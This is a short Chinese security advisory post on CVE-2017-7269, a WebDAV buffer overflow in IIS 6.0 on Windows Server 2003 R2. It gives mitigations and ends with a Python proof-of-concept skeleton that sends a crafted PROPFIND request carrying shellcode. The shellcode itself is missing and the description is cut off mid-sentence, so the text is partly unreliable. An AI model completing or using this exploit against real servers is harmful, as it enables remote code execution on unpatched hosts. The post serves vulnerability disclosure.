IIS 6.0曝远程代码执行漏洞CVE-2017-7269。

IIS 6.0曝远程代码执行漏洞CVE-2017-7269。-唯嘉利亚云安全
;漏洞描述

微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If。

由于开启WebDAV服务就存在该漏洞,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。

漏洞编号

CVE-2017-7269

其他信息

ScStoragePathFromUrl函数被调用两次

影响版本

Windows Server 2003 R2

攻击向量

修改过的PROFIND数据

 

建议处理方式:

1.关闭IIS的Webdav

2.升级IIS或者更换apache解析php

 

漏洞发现者

Zhiniang Peng和Chen Wu(华南理工大学计算机科学与工程学院信息安全实验室)

PoC

#————Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.

#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China

#———–Email: edwardz@foxmail.com

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.connect((‘127.0.0.1′,80))

pay=’PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n’

pay+=shellcode

pay+=’>\r\n\r\n’

print pay

sock.send(pay)

data = sock.recv(80960)

print data

sock.close